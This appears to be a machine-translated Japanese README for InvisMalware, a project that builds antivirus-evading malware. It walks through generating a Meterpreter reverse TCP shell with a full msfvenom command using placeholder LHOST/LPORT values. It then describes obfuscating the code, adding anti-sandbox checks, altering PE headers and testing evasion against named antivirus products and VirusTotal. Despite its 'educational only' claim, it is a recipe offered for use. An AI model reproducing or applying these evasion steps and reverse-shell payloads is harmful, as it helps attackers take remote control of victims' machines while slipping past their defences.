InvisMalware

1. 導入
2. 特徴
3. インストール
4. 使用法
5. 実験方法論
6. テスト
7. 貢献
8. ライセンス

Invismalwareは、ウイルス対策検出をバイパスする高度なマルウェア回避技術を実証するように設計されたプロジェクトです。この研究駆動型のマルウェア実験は、コード変更やアンチサンドボックス戦略などの難読化方法を利用して、静的および動的マルウェア検出を回避することに焦点を当てています。

このプロジェクトは、悪意のある俳優が使用する回避技術から学ぶことにより、最新のマルウェア防衛戦略に関する洞察を提供することを目的とした教育目的のみを目的としています。

• シェルコード生成：MSFvenomを使用してカスタムリバースTCPシェルペイロードを作成します。
• コード難読化：マルウェアコードを変更して、NOPSを追加し、PEヘッダーを操作することにより、アンチウイルス検出を回避します。
• 反ダイナミック分析：オーディオドライバーやUSBデバイスの存在などのサンドボックス環境を検出するためのチェックを含めます。
• PEヘッダー操作：ポータブル実行可能ファイル（PE）ヘッダーを調整して、署名ベースの検出を避けることにより、マルウェアを偽装します。
• 回避率の計算：さまざまなウイルス対策エンジンの結果を比較することにより、回避技術の有効性を測定します。

開始するには、リポジトリをクローンし、必要な依存関係をインストールします。

• Python 3.x
• VirtualBox/VMware（仮想環境でのテスト用）
• Metasploitフレームワーク（シェルコードを生成するため）
• PE-BEAR （PEヘッダー操作用）

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

MSFvenomを使用して、逆TCPシェルコードを生成します。

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

evilexp.cファイルを編集して、コードを難読化し、検出を避けます。

マルウェアを安全で分離した仮想マシンに展開して、その動作をテストし、検出率を測定します。

マルウェアをビルストタルにアップロードして、複数のウイルス対策エンジンにわたって回避率を評価します。

このプロジェクトは、マルウェア回避を達成するために4段階の方法論に従っています。

1. シェルコード生成：ベースラインリバースシェルコードを作成します。
2. コードの変更：シェルコードを難読化して、検出を回避します。
3. 抗ダイナミック分析：サンドボックス検出を追加して、動的分析ツールをバイパスします。
4. PEヘッダーの変更：PEヘッダーを変更して、マルウェアの署名をさらに難読化します。

Kaspersky 、 Windows Defender 、 BitDefenderなどのウイルス対策ソフトウェアを備えた仮想マシンでマルウェアを実行します。

修正されたマルウェアをVirustotalにアップロードし、それを正常に検出するいくつのウイルス対策エンジンを確認します。

プロジェクトを改善するための貢献を歓迎します。貢献したい場合：

1. リポジトリをフォークします。
2. 機能またはバグ修正用の新しいブランチを作成します。
3. 変更に関する詳細情報を含むプルリクエストを提出してください。

このプロジェクトは、MITライセンスの下でライセンスされています。詳細については、ライセンスファイルを参照してください。